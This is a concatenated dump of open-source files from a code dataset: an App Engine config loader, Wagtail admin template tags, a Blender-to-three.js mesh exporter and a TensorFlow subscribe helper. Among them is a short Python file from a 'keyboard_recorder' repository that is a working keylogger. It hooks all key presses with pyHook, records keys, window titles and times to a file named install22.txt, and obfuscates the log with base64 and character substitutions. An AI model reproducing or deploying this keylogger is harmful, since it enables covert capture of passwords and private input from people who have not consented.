"""Get the latest configuration data for this app-version from the datastore.
Args:
app_version: the major version you want configuration data for.
Side Effects:
We populate memcache with whatever we find in the datastore.
Returns:
A config class instance for most recently set options or None if the
query could not complete due to a datastore exception.
"""
rpc = db.create_rpc(deadline=DATASTORE_DEADLINE,
read_policy=db.EVENTUAL_CONSISTENCY)
key = _get_active_config_key(app_version)
config = None
try:
config = Config.get(key, rpc=rpc)
logging.debug('Loaded most recent conf data from datastore.')
except:
logging.warning('Tried but failed to fetch latest conf data from the '
'datastore.')
if config:
memcache.set(app_version, db.model_to_protobuf(config).Encode(),
namespace=NAMESPACE)
logging.debug('Wrote most recent conf data into memcache.')
return config
def _fetch_latest_from_memcache(app_version):
"""Get the latest configuration data for this app-version from memcache.
Args:
app_version: the major version you want configuration data for.
Returns:
A Config class instance for most recently set options or None if none
could be found in memcache.
"""
proto_string = memcache.get(app_version, namespace=NAMESPACE)
if proto_string:
logging.debug('Loaded most recent conf data from memcache.')
return db.model_from_protobuf(proto_string)
logging.debug('Tried to load conf data from memcache, but found nothing.')
return None
def _inspect_environment():
"""Return relevant information from the cgi environment.
This is mostly split out to simplify testing.
Returns:
A tuple: (app_version, conf_version, development)
app_version: the major version of the current application.
conf_version: the current configuration version.
development: a boolean, True if we're running under devappserver.
"""
app_version = os.environ['CURRENT_VERSION_ID'].rsplit('.', 1)[0]
conf_version = int(os.environ.get('CURRENT_CONFIGURATION_VERSION', '0'))
development = os.environ.get('SERVER_SOFTWARE', '').startswith('Development/')
return (app_version, conf_version, development)
def refresh():
"""Update the local config cache from memcache/datastore.
Normally configuration parameters are only refreshed at the start of a
new request. If you have a very long running request, or you just need
the freshest data for some reason, you can call this function to force
a refresh.
"""
app_version, _, _ = _inspect_environment()
global _cached_config
new_config = _fetch_latest_from_memcache(app_version)
if not new_config:
new_config = _fetch_latest_from_datastore(app_version)
if new_config:
_cached_config = new_config
def _new_request():
"""Test if this is the first call to this function in the current request.
This function will return True exactly once for each request.
Subsequent calls in the same request will return False.
Returns:
True if this is the first call in a given request, False otherwise.
"""
if RESERVED_MARKER in os.environ:
return False
os.environ[RESERVED_MARKER] = RESERVED_MARKER
return True
def _get_config():
"""Check if the current cached config is stale, and if so update it."""
app_version, current_config_version, development = _inspect_environment()
global _cached_config
if (development and _new_request()) or not _cached_config:
_cached_config = _fetch_from_local_file() or Config()
if _cached_config.ah__conf__version < current_config_version:
newconfig = _fetch_latest_from_memcache(app_version)
if not newconfig or newconfig.ah__conf__version < current_config_version:
newconfig = _fetch_latest_from_datastore(app_version)
_cached_config = newconfig or _cached_config
return _cached_config
def get(name, default=None):
"""Get the value of a configuration parameter.
This function is guaranteed to return the same value for every call
during a single request.
Args:
name: The name of the configuration parameter you want a value for.
default: A default value to return if the named parameter doesn't exist.
Returns:
The string value of the configuration parameter.
"""
return getattr(_get_config(), name, default)
def get_all():
"""Return an object with an attribute for each conf parameter.
Returns:
An object with an attribute for each conf parameter.
"""
return _get_config()
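# Illustrative usage sketch (added; the import path is assumed from this file's
# location under google/appengine/api/):
#   from google.appengine.api import conf
#   color = conf.get('background_color', default='red')  # parameter from conf.yaml
#   params = conf.get_all()                               # one attribute per parameter
#   conf.refresh()  # force a mid-request re-read from memcache/datastore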
|
bsd-2-clause
|
timorieber/wagtail
|
wagtail/contrib/modeladmin/templatetags/modeladmin_tags.py
|
5
|
6591
|
import datetime
from django.contrib.admin.templatetags.admin_list import ResultList, result_headers
from django.contrib.admin.utils import display_for_field, display_for_value, lookup_field
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.forms.utils import flatatt
from django.template import Library
from django.template.loader import get_template
from django.utils.encoding import force_str
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
register = Library()
def items_for_result(view, result):
"""
Generates the actual list of data.
"""
modeladmin = view.model_admin
for field_name in view.list_display:
empty_value_display = modeladmin.get_empty_value_display(field_name)
row_classes = ['field-%s' % field_name]
try:
f, attr, value = lookup_field(field_name, result, modeladmin)
except ObjectDoesNotExist:
result_repr = empty_value_display
else:
empty_value_display = getattr(
attr, 'empty_value_display', empty_value_display)
if f is None or f.auto_created:
allow_tags = getattr(attr, 'allow_tags', False)
boolean = getattr(attr, 'boolean', False)
if boolean or not value:
allow_tags = True
result_repr = display_for_value(
value, empty_value_display, boolean)
# Strip HTML tags in the resulting text, except if the
# function has an "allow_tags" attribute set to True.
if allow_tags:
result_repr = mark_safe(result_repr)
if isinstance(value, (datetime.date, datetime.time)):
row_classes.append('nowrap')
else:
if isinstance(f, models.ManyToOneRel):
field_val = getattr(result, f.name)
if field_val is None:
result_repr = empty_value_display
else:
result_repr = field_val
else:
result_repr = display_for_field(
value, f, empty_value_display)
if isinstance(f, (
models.DateField, models.TimeField, models.ForeignKey)
):
row_classes.append('nowrap')
if force_str(result_repr) == '':
result_repr = mark_safe('&nbsp;')
row_classes.extend(
modeladmin.get_extra_class_names_for_field_col(result, field_name)
)
row_attrs = modeladmin.get_extra_attrs_for_field_col(result, field_name)
row_attrs['class'] = ' '.join(row_classes)
row_attrs_flat = flatatt(row_attrs)
yield format_html('<td{}>{}</td>', row_attrs_flat, result_repr)
def results(view, object_list):
for item in object_list:
yield ResultList(None, items_for_result(view, item))
@register.inclusion_tag("modeladmin/includes/result_list.html",
takes_context=True)
def result_list(context):
"""
Displays the headers and data list together
"""
view = context['view']
object_list = context['object_list']
headers = list(result_headers(view))
num_sorted_fields = 0
for h in headers:
if h['sortable'] and h['sorted']:
num_sorted_fields += 1
context.update({
'result_headers': headers,
'num_sorted_fields': num_sorted_fields,
'results': list(results(view, object_list))})
return context
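# Illustrative template usage (added; tag names come from the registrations in
# this module, while the 'page_obj' context variable is assumed):
#   {% load modeladmin_tags %}
#   {% result_list %}
#   {% search_form %}
#   {% pagination_link_previous page_obj view %}
#   {% pagination_link_next page_obj view %}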
@register.simple_tag
def pagination_link_previous(current_page, view):
if current_page.has_previous():
previous_page_number0 = current_page.previous_page_number() - 1
return format_html(
'<li class="prev"><a href="%s" class="icon icon-arrow-left">%s'
'</a></li>' %
(view.get_query_string({view.PAGE_VAR: previous_page_number0}),
_('Previous'))
)
return ''
@register.simple_tag
def pagination_link_next(current_page, view):
if current_page.has_next():
next_page_number0 = current_page.next_page_number() - 1
return format_html(
'<li class="next"><a href="%s" class="icon icon-arrow-right-after"'
'>%s</a></li>' %
(view.get_query_string({view.PAGE_VAR: next_page_number0}),
_('Next'))
)
return ''
@register.inclusion_tag(
"modeladmin/includes/search_form.html", takes_context=True)
def search_form(context):
context.update({'search_var': context['view'].SEARCH_VAR})
return context
@register.simple_tag
def admin_list_filter(view, spec):
template_name = spec.template
if template_name == 'admin/filter.html':
template_name = 'modeladmin/includes/filter.html'
tpl = get_template(template_name)
return tpl.render({
'title': spec.title,
'choices': list(spec.choices(view)),
'spec': spec,
})
@register.inclusion_tag(
"modeladmin/includes/result_row.html", takes_context=True)
def result_row_display(context, index):
obj = context['object_list'][index]
view = context['view']
row_attrs_dict = view.model_admin.get_extra_attrs_for_row(obj, context)
row_attrs_dict['data-object-pk'] = obj.pk
odd_or_even = 'odd' if (index % 2 == 0) else 'even'
if 'class' in row_attrs_dict:
row_attrs_dict['class'] += ' %s' % odd_or_even
else:
row_attrs_dict['class'] = odd_or_even
context.update({
'obj': obj,
'row_attrs': mark_safe(flatatt(row_attrs_dict)),
'action_buttons': view.get_buttons_for_obj(obj),
})
return context
@register.inclusion_tag(
"modeladmin/includes/result_row_value.html", takes_context=True)
def result_row_value_display(context, index):
add_action_buttons = False
item = context['item']
closing_tag = mark_safe(item[-5:])
request = context['request']
model_admin = context['view'].model_admin
field_name = model_admin.get_list_display(request)[index]
if field_name == model_admin.get_list_display_add_buttons(request):
add_action_buttons = True
item = mark_safe(item[0:-5])
context.update({
'item': item,
'add_action_buttons': add_action_buttons,
'closing_tag': closing_tag,
})
return context
@register.filter
def get_content_type_for_obj(obj):
return obj.__class__._meta.verbose_name
|
bsd-3-clause
|
cyankw/keyboard_recorder
|
Beta Testing Version/py-hook V2.py
|
2
|
1695
|
# -*- coding: utf-8 -*- #
__author__ = 'cyankw'
import pythoncom
import pyHook
import datetime
import urllib, base64
from multiprocessing import Pool
kll=[]
kll2=[]
oldname = ''
def onKeyboardEvent(event):
# Listen for keyboard events
timeNow = datetime.datetime.now()
Now = timeNow.strftime('%H:%M:%S')
wrfile = open(r'd://install22.txt', 'a')
evtname = event.WindowName
global oldname
NAME = "WindowName:%s\n" % event.WindowName
TIME="Time:%s\n" % datetime.datetime.now()
KEY=" Key:%s-%s \n" % (event.Key, Now)
LINE="---------\n"
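# (Added comment) Obfuscate each field before logging it: percent-encode with
# urllib.quote, base64-encode, then swap a few marker substrings so the output
# is not trivially readable (see the replace() calls below).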
NAME=base64.encodestring(urllib.quote(NAME))
TIME=base64.encodestring(urllib.quote(TIME))
KEY=base64.encodestring(urllib.quote(KEY))
LINE=base64.encodestring(urllib.quote(LINE))
NAME = NAME.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
KEY = KEY.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
TIME = TIME.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
LINE = LINE.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
while evtname != oldname:
wrfile.write(LINE)
wrfile.write(NAME)
wrfile.write(TIME)
oldname = event.WindowName
print LINE
print NAME
print TIME
wrfile.write(KEY)
print KEY
return True
def main():
# Create a "hook" manager object
hm = pyHook.HookManager()
# Listen for all keyboard events
hm.KeyDown = onKeyboardEvent
# Set up the keyboard "hook"
hm.HookKeyboard()
pythoncom.PumpMessages()
if __name__ == "__main__":
p = Pool(processes=8)
main()
p.close()
p.join()
|
apache-2.0
|
ryangibbs/tosser
|
three.js/utils/exporters/blender/addons/io_three/exporter/api/mesh.py
|
124
|
23228
|
"""
Blender API for querying mesh data. Animation data is also
handled here since Three.js associates the animation (skeletal,
morph targets) with the geometry nodes.
"""
import operator
from bpy import data, types, context
from . import material, texture, animation
from . import object as object_
from .. import constants, utilities, logger, exceptions
def _mesh(func):
"""
:param func:
"""
def inner(name, *args, **kwargs):
"""
:param name:
:param *args:
:param **kwargs:
"""
if isinstance(name, types.Mesh):
mesh = name
else:
mesh = data.meshes[name]
return func(mesh, *args, **kwargs)
return inner
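# Illustrative note (added): because of this decorator, the module's public
# functions accept either a mesh name or a bpy mesh datablock, e.g.
#   vertices('Cube')
#   vertices(bpy.data.meshes['Cube'])
# both resolve to the same mesh before the wrapped function runs ('Cube' is a
# hypothetical mesh name).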
@_mesh
def skeletal_animation(mesh, options):
"""
:param mesh:
:param options:
:rtype: []
"""
logger.debug("mesh.animation(%s, %s)", mesh, options)
armature = _armature(mesh)
if not armature:
logger.warning("No armature found (%s)", mesh)
return []
anim_type = options.get(constants.ANIMATION)
# pose_position = armature.data.pose_position
dispatch = {
constants.POSE: animation.pose_animation,
constants.REST: animation.rest_animation
}
func = dispatch[anim_type]
# armature.data.pose_position = anim_type.upper()
animations = func(armature, options)
# armature.data.pose_position = pose_position
return animations
@_mesh
def bones(mesh, options):
"""
:param mesh:
:param options:
:rtype: [], {}
"""
logger.debug("mesh.bones(%s)", mesh)
armature = _armature(mesh)
if not armature:
return [], {}
anim_type = options.get(constants.ANIMATION)
# pose_position = armature.data.pose_position
if anim_type == constants.OFF:
logger.info("Animation type not set, defaulting "
"to using REST position for the armature.")
func = _rest_bones
# armature.data.pose_position = "REST"
else:
dispatch = {
constants.REST: _rest_bones,
constants.POSE: _pose_bones
}
logger.info("Using %s for the armature", anim_type)
func = dispatch[anim_type]
# armature.data.pose_position = anim_type.upper()
bones_, bone_map = func(armature)
# armature.data.pose_position = pose_position
return (bones_, bone_map)
@_mesh
def buffer_normal(mesh):
"""
:param mesh:
:rtype: []
"""
normals_ = []
for face in mesh.tessfaces:
vert_count = len(face.vertices)
if vert_count is not 3:
msg = "Non-triangulated face detected"
raise exceptions.BufferGeometryError(msg)
for vertex_index in face.vertices:
normal = mesh.vertices[vertex_index].normal
vector = (normal.x, normal.y, normal.z)
normals_.extend(vector)
return normals_
@_mesh
def buffer_position(mesh):
"""
:param mesh:
:rtype: []
"""
position = []
for face in mesh.tessfaces:
vert_count = len(face.vertices)
if vert_count is not 3:
msg = "Non-triangulated face detected"
raise exceptions.BufferGeometryError(msg)
for vertex_index in face.vertices:
vertex = mesh.vertices[vertex_index]
vector = (vertex.co.x, vertex.co.y, vertex.co.z)
position.extend(vector)
return position
@_mesh
def buffer_uv(mesh):
"""
:param mesh:
:rtype: []
"""
uvs_ = []
if len(mesh.uv_layers) is 0:
return uvs_
elif len(mesh.uv_layers) > 1:
# if memory serves me correctly buffer geometry
# only uses one UV layer
logger.warning("%s has more than 1 UV layer", mesh.name)
for uv_data in mesh.uv_layers[0].data:
uv_tuple = (uv_data.uv[0], uv_data.uv[1])
uvs_.extend(uv_tuple)
return uvs_
@_mesh
def faces(mesh, options):
"""
:param mesh:
:param options:
"""
logger.debug("mesh.faces(%s, %s)", mesh, options)
vertex_uv = len(mesh.uv_textures) > 0
has_colors = len(mesh.vertex_colors) > 0
logger.info("Has UVs = %s", vertex_uv)
logger.info("Has vertex colours = %s", has_colors)
opt_colours = options[constants.COLORS] and has_colors
opt_uvs = options[constants.UVS] and vertex_uv
opt_materials = options.get(constants.FACE_MATERIALS)
opt_normals = options[constants.NORMALS]
logger.debug("Vertex colours enabled = %s", opt_colours)
logger.debug("UVS enabled = %s", opt_uvs)
logger.debug("Materials enabled = %s", opt_materials)
logger.debug("Normals enabled = %s", opt_normals)
uv_layers = _uvs(mesh) if opt_uvs else None
vertex_normals = _normals(mesh) if opt_normals else None
vertex_colours = vertex_colors(mesh) if opt_colours else None
faces_data = []
colour_indices = {}
if vertex_colours:
logger.debug("Indexing colours")
for index, colour in enumerate(vertex_colours):
colour_indices[str(colour)] = index
normal_indices = {}
if vertex_normals:
logger.debug("Indexing normals")
for index, normal in enumerate(vertex_normals):
normal_indices[str(normal)] = index
logger.info("Parsing %d faces", len(mesh.tessfaces))
for face in mesh.tessfaces:
vert_count = len(face.vertices)
if vert_count not in (3, 4):
logger.error("%d vertices for face %d detected",
vert_count,
face.index)
raise exceptions.NGonError("ngons are not supported")
mat_index = face.material_index is not None and opt_materials
mask = {
constants.QUAD: vert_count is 4,
constants.MATERIALS: mat_index,
constants.UVS: False,
constants.NORMALS: False,
constants.COLORS: False
}
face_data = []
face_data.extend([v for v in face.vertices])
if mask[constants.MATERIALS]:
face_data.append(face.material_index)
# @TODO: this needs the same optimization as what
# was done for colours and normals
if uv_layers:
for index, uv_layer in enumerate(uv_layers):
layer = mesh.tessface_uv_textures[index]
for uv_data in layer.data[face.index].uv:
uv_tuple = (uv_data[0], uv_data[1])
face_data.append(uv_layer.index(uv_tuple))
mask[constants.UVS] = True
if vertex_normals:
for vertex in face.vertices:
normal = mesh.vertices[vertex].normal
normal = (normal.x, normal.y, normal.z)
face_data.append(normal_indices[str(normal)])
mask[constants.NORMALS] = True
if vertex_colours:
colours = mesh.tessface_vertex_colors.active.data[face.index]
for each in (colours.color1, colours.color2, colours.color3):
each = utilities.rgb2int(each)
face_data.append(colour_indices[str(each)])
mask[constants.COLORS] = True
if mask[constants.QUAD]:
colour = utilities.rgb2int(colours.color4)
face_data.append(colour_indices[str(colour)])
face_data.insert(0, utilities.bit_mask(mask))
faces_data.extend(face_data)
return faces_data
@_mesh
def morph_targets(mesh, options):
"""
:param mesh:
:param options:
"""
logger.debug("mesh.morph_targets(%s, %s)", mesh, options)
obj = object_.objects_using_mesh(mesh)[0]
original_frame = context.scene.frame_current
frame_step = options.get(constants.FRAME_STEP, 1)
scene_frames = range(context.scene.frame_start,
context.scene.frame_end+1,
frame_step)
morphs = []
for frame in scene_frames:
logger.info("Processing data at frame %d", frame)
context.scene.frame_set(frame, 0.0)
morphs.append([])
vertices_ = object_.extract_mesh(obj, options).vertices[:]
for vertex in vertices_:
morphs[-1].extend([vertex.co.x, vertex.co.y, vertex.co.z])
context.scene.frame_set(original_frame, 0.0)
morphs_detected = False
for index, each in enumerate(morphs):
if index is 0:
continue
morphs_detected = morphs[index-1] != each
if morphs_detected:
logger.info("Valid morph target data detected")
break
else:
logger.info("No valid morph data detected")
return []
manifest = []
for index, morph in enumerate(morphs):
manifest.append({
constants.NAME: 'animation_%06d' % index,
constants.VERTICES: morph
})
return manifest
@_mesh
def materials(mesh, options):
"""
:param mesh:
:param options:
"""
logger.debug("mesh.materials(%s, %s)", mesh, options)
indices = set([face.material_index for face in mesh.tessfaces])
material_sets = [(mesh.materials[index], index) for index in indices]
materials_ = []
maps = options.get(constants.MAPS)
mix = options.get(constants.MIX_COLORS)
use_colors = options.get(constants.COLORS)
logger.info("Colour mix is set to %s", mix)
logger.info("Vertex colours set to %s", use_colors)
for mat, index in material_sets:
try:
dbg_color = constants.DBG_COLORS[index]
except IndexError:
dbg_color = constants.DBG_COLORS[0]
logger.info("Compiling attributes for %s", mat.name)
attributes = {
constants.COLOR_AMBIENT: material.ambient_color(mat),
constants.COLOR_EMISSIVE: material.emissive_color(mat),
constants.SHADING: material.shading(mat),
constants.OPACITY: material.opacity(mat),
constants.TRANSPARENT: material.transparent(mat),
constants.VISIBLE: material.visible(mat),
constants.WIREFRAME: material.wireframe(mat),
constants.BLENDING: material.blending(mat),
constants.DEPTH_TEST: material.depth_test(mat),
constants.DEPTH_WRITE: material.depth_write(mat),
constants.DBG_NAME: mat.name,
constants.DBG_COLOR: dbg_color,
constants.DBG_INDEX: index
}
if use_colors:
colors = material.use_vertex_colors(mat)
attributes[constants.VERTEX_COLORS] = colors
if (use_colors and mix) or (not use_colors):
colors = material.diffuse_color(mat)
attributes[constants.COLOR_DIFFUSE] = colors
if attributes[constants.SHADING] == constants.PHONG:
logger.info("Adding specular attributes")
attributes.update({
constants.SPECULAR_COEF: material.specular_coef(mat),
constants.COLOR_SPECULAR: material.specular_color(mat)
})
if mesh.show_double_sided:
logger.info("Double sided is on")
attributes[constants.DOUBLE_SIDED] = True
materials_.append(attributes)
if not maps:
continue
diffuse = _diffuse_map(mat)
if diffuse:
logger.info("Diffuse map found")
attributes.update(diffuse)
light = _light_map(mat)
if light:
logger.info("Light map found")
attributes.update(light)
specular = _specular_map(mat)
if specular:
logger.info("Specular map found")
attributes.update(specular)
if attributes[constants.SHADING] == constants.PHONG:
normal = _normal_map(mat)
if normal:
logger.info("Normal map found")
attributes.update(normal)
bump = _bump_map(mat)
if bump:
logger.info("Bump map found")
attributes.update(bump)
return materials_
@_mesh
def normals(mesh):
"""
:param mesh:
:rtype: []
"""
logger.debug("mesh.normals(%s)", mesh)
normal_vectors = []
for vector in _normals(mesh):
normal_vectors.extend(vector)
return normal_vectors
@_mesh
def skin_weights(mesh, bone_map, influences):
"""
:param mesh:
:param bone_map:
:param influences:
"""
logger.debug("mesh.skin_weights(%s)", mesh)
return _skinning_data(mesh, bone_map, influences, 1)
@_mesh
def skin_indices(mesh, bone_map, influences):
"""
:param mesh:
:param bone_map:
:param influences:
"""
logger.debug("mesh.skin_indices(%s)", mesh)
return _skinning_data(mesh, bone_map, influences, 0)
@_mesh
def texture_registration(mesh):
"""
:param mesh:
"""
logger.debug("mesh.texture_registration(%s)", mesh)
materials_ = mesh.materials or []
registration = {}
funcs = (
(constants.MAP_DIFFUSE, material.diffuse_map),
(constants.SPECULAR_MAP, material.specular_map),
(constants.LIGHT_MAP, material.light_map),
(constants.BUMP_MAP, material.bump_map),
(constants.NORMAL_MAP, material.normal_map)
)
def _registration(file_path, file_name):
"""
:param file_path:
:param file_name:
"""
return {
'file_path': file_path,
'file_name': file_name,
'maps': []
}
logger.info("found %d materials", len(materials_))
for mat in materials_:
for (key, func) in funcs:
tex = func(mat)
if tex is None:
continue
logger.info("%s has texture %s", key, tex.name)
file_path = texture.file_path(tex)
file_name = texture.file_name(tex)
reg = registration.setdefault(
utilities.hash(file_path),
_registration(file_path, file_name))
reg["maps"].append(key)
return registration
@_mesh
def uvs(mesh):
"""
:param mesh:
:rtype: []
"""
logger.debug("mesh.uvs(%s)", mesh)
uvs_ = []
for layer in _uvs(mesh):
uvs_.append([])
logger.info("Parsing UV layer %d", len(uvs_))
for pair in layer:
uvs_[-1].extend(pair)
return uvs_
@_mesh
def vertex_colors(mesh):
"""
:param mesh:
"""
logger.debug("mesh.vertex_colors(%s)", mesh)
vertex_colours = []
try:
vertex_colour = mesh.tessface_vertex_colors.active.data
except AttributeError:
logger.info("No vertex colours found")
return
for face in mesh.tessfaces:
colours = (vertex_colour[face.index].color1,
vertex_colour[face.index].color2,
vertex_colour[face.index].color3,
vertex_colour[face.index].color4)
for colour in colours:
colour = utilities.rgb2int((colour.r, colour.g, colour.b))
if colour not in vertex_colours:
vertex_colours.append(colour)
return vertex_colours
@_mesh
def vertices(mesh):
"""
:param mesh:
:rtype: []
"""
logger.debug("mesh.vertices(%s)", mesh)
vertices_ = []
for vertex in mesh.vertices:
vertices_.extend((vertex.co.x, vertex.co.y, vertex.co.z))
return vertices_
def _normal_map(mat):
"""
:param mat:
"""
tex = material.normal_map(mat)
if tex is None:
return
logger.info("Found normal texture map %s", tex.name)
normal = {
constants.MAP_NORMAL:
texture.file_name(tex),
constants.MAP_NORMAL_FACTOR:
material.normal_scale(mat),
constants.MAP_NORMAL_ANISOTROPY:
texture.anisotropy(tex),
constants.MAP_NORMAL_WRAP: texture.wrap(tex),
constants.MAP_NORMAL_REPEAT: texture.repeat(tex)
}
return normal
def _bump_map(mat):
"""
:param mat:
"""
tex = material.bump_map(mat)
if tex is None:
return
logger.info("Found bump texture map %s", tex.name)
bump = {
constants.MAP_BUMP:
texture.file_name(tex),
constants.MAP_BUMP_ANISOTROPY:
texture.anisotropy(tex),
constants.MAP_BUMP_WRAP: texture.wrap(tex),
constants.MAP_BUMP_REPEAT: texture.repeat(tex),
constants.MAP_BUMP_SCALE:
material.bump_scale(mat),
}
return bump
def _specular_map(mat):
"""
:param mat:
"""
tex = material.specular_map(mat)
if tex is None:
return
logger.info("Found specular texture map %s", tex.name)
specular = {
constants.MAP_SPECULAR:
texture.file_name(tex),
constants.MAP_SPECULAR_ANISOTROPY:
texture.anisotropy(tex),
constants.MAP_SPECULAR_WRAP: texture.wrap(tex),
constants.MAP_SPECULAR_REPEAT: texture.repeat(tex)
}
return specular
def _light_map(mat):
"""
:param mat:
"""
tex = material.light_map(mat)
if tex is None:
return
logger.info("Found light texture map %s", tex.name)
light = {
constants.MAP_LIGHT:
texture.file_name(tex),
constants.MAP_LIGHT_ANISOTROPY:
texture.anisotropy(tex),
constants.MAP_LIGHT_WRAP: texture.wrap(tex),
constants.MAP_LIGHT_REPEAT: texture.repeat(tex)
}
return light
def _diffuse_map(mat):
"""
:param mat:
"""
tex = material.diffuse_map(mat)
if tex is None:
return
logger.info("Found diffuse texture map %s", tex.name)
diffuse = {
constants.MAP_DIFFUSE:
texture.file_name(tex),
constants.MAP_DIFFUSE_ANISOTROPY:
texture.anisotropy(tex),
constants.MAP_DIFFUSE_WRAP: texture.wrap(tex),
constants.MAP_DIFFUSE_REPEAT: texture.repeat(tex)
}
return diffuse
def _normals(mesh):
"""
:param mesh:
:rtype: []
"""
vectors = []
vectors_ = {}
for face in mesh.tessfaces:
for vertex_index in face.vertices:
normal = mesh.vertices[vertex_index].normal
vector = (normal.x, normal.y, normal.z)
str_vec = str(vector)
try:
vectors_[str_vec]
except KeyError:
vectors.append(vector)
vectors_[str_vec] = True
return vectors
def _uvs(mesh):
"""
:param mesh:
"""
uv_layers = []
for layer in mesh.uv_layers:
uv_layers.append([])
for uv_data in layer.data:
uv_tuple = (uv_data.uv[0], uv_data.uv[1])
if uv_tuple not in uv_layers[-1]:
uv_layers[-1].append(uv_tuple)
return uv_layers
def _armature(mesh):
"""
:param mesh:
"""
obj = object_.objects_using_mesh(mesh)[0]
armature = obj.find_armature()
if armature:
logger.info("Found armature %s for %s", armature.name, obj.name)
else:
logger.info("Found no armature for %s", obj.name)
return armature
def _skinning_data(mesh, bone_map, influences, array_index):
"""
:param mesh:
:param bone_map:
:param influences:
:param array_index:
"""
armature = _armature(mesh)
manifest = []
if not armature:
return manifest
obj = object_.objects_using_mesh(mesh)[0]
logger.debug("Skinned object found %s", obj.name)
for vertex in mesh.vertices:
bone_array = []
for group in vertex.groups:
bone_array.append((group.group, group.weight))
bone_array.sort(key=operator.itemgetter(1), reverse=True)
for index in range(influences):
if index >= len(bone_array):
manifest.append(0)
continue
name = obj.vertex_groups[bone_array[index][0]].name
for bone_index, bone in enumerate(armature.pose.bones):
if bone.name != name:
continue
                if array_index == 0:
entry = bone_map.get(bone_index, -1)
else:
entry = bone_array[index][1]
manifest.append(entry)
break
else:
manifest.append(0)
return manifest
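# Illustrative sketch (not part of this exporter): the per-vertex padding that
# _skinning_data performs, shown standalone without bpy. 'groups' stands in for
# a vertex's (bone_index, weight) pairs and 'influences' is the fixed number of
# slots written per vertex; missing slots are padded with 0, mirroring the
# manifest.append(0) branches above.
def _pad_influences(groups, influences, array_index):
    """Return the top-N bone indices (array_index=0) or weights (array_index=1)."""
    ordered = sorted(groups, key=lambda pair: pair[1], reverse=True)
    out = []
    for slot in range(influences):
        if slot >= len(ordered):
            out.append(0)
        else:
            out.append(ordered[slot][array_index])
    return out
# Two bones influence this vertex; exporting with influences=4 pads two slots.
assert _pad_influences([(3, 0.25), (1, 0.75)], 4, 0) == [1, 3, 0, 0]
assert _pad_influences([(3, 0.25), (1, 0.75)], 4, 1) == [0.75, 0.25, 0, 0]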
def _pose_bones(armature):
"""
:param armature:
:rtype: [], {}
"""
bones_ = []
bone_map = {}
bone_count = 0
armature_matrix = armature.matrix_world
for bone_count, pose_bone in enumerate(armature.pose.bones):
armature_bone = pose_bone.bone
bone_index = None
if armature_bone.parent is None:
bone_matrix = armature_matrix * armature_bone.matrix_local
bone_index = -1
else:
parent_bone = armature_bone.parent
parent_matrix = armature_matrix * parent_bone.matrix_local
bone_matrix = armature_matrix * armature_bone.matrix_local
bone_matrix = parent_matrix.inverted() * bone_matrix
bone_index = index = 0
for pose_parent in armature.pose.bones:
armature_parent = pose_parent.bone.name
if armature_parent == parent_bone.name:
bone_index = index
index += 1
bone_map[bone_count] = bone_count
pos, rot, scl = bone_matrix.decompose()
bones_.append({
constants.PARENT: bone_index,
constants.NAME: armature_bone.name,
constants.POS: (pos.x, pos.z, -pos.y),
constants.ROTQ: (rot.x, rot.z, -rot.y, rot.w),
constants.SCL: (scl.x, scl.z, scl.y)
})
return bones_, bone_map
def _rest_bones(armature):
"""
:param armature:
:rtype: [], {}
"""
bones_ = []
bone_map = {}
bone_count = 0
bone_index_rel = 0
for bone in armature.data.bones:
logger.info("Parsing bone %s", bone.name)
if not bone.use_deform:
logger.debug("Ignoring bone %s at: %d",
bone.name, bone_index_rel)
continue
if bone.parent is None:
bone_pos = bone.head_local
bone_index = -1
else:
bone_pos = bone.head_local - bone.parent.head_local
bone_index = 0
index = 0
for parent in armature.data.bones:
if parent.name == bone.parent.name:
bone_index = bone_map.get(index)
index += 1
bone_world_pos = armature.matrix_world * bone_pos
x_axis = bone_world_pos.x
y_axis = bone_world_pos.z
z_axis = -bone_world_pos.y
logger.debug("Adding bone %s at: %s, %s",
bone.name, bone_index, bone_index_rel)
bone_map[bone_count] = bone_index_rel
bone_index_rel += 1
# @TODO: the rotq probably should not have these
# hard coded values
bones_.append({
constants.PARENT: bone_index,
constants.NAME: bone.name,
constants.POS: (x_axis, y_axis, z_axis),
constants.ROTQ: (0, 0, 0, 1)
})
bone_count += 1
return (bones_, bone_map)
|
mit
|
chenjun0210/tensorflow
|
tensorflow/python/framework/subscribe.py
|
16
|
11056
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Subscribe function."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
def _recursive_apply(tensors, apply_fn):
"""Helper method to recursively apply a function to structure of tensors.
The structure of the tensors should take the form similar to fetches in
`tf.Session` and includes single `Tensor`, `list`, nested `list`, `tuple`,
`namedtuple`, or `dict`.
Args:
    tensors: Single `Tensor`, `list`, nested `list`, `tuple`,
`namedtuple`, or `dict`.
apply_fn: Function to apply to each `Tensor` and should return a `Tensor`.
Returns:
Returns the modified tensors with the same structure.
Raises:
`TypeError` if undefined type in the tensors structure.
"""
tensors_type = type(tensors)
if tensors_type is ops.Tensor:
return apply_fn(tensors)
elif tensors_type is variables.Variable:
return apply_fn(tensors.value())
elif isinstance(tensors, (list, tuple)):
tensors = [_recursive_apply(t, apply_fn) for t in tensors]
if tensors_type is list:
return list(tensors)
elif tensors_type is tuple:
return tuple(tensors)
return tensors_type(*tensors) # collections.namedtuple
elif tensors_type is dict:
return dict([(k, _recursive_apply(v, apply_fn))
for k, v in tensors.items()])
else:
raise TypeError('_recursive_apply argument %r has invalid type %r' %
(tensors, tensors_type))
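# Illustrative sketch (not part of this module): a plain-Python analogue of
# _recursive_apply showing how the input structure is preserved while only the
# leaves are transformed. The real helper accepts only Tensors/Variables at the
# leaves; plain ints are used here purely to demonstrate the recursion shape.
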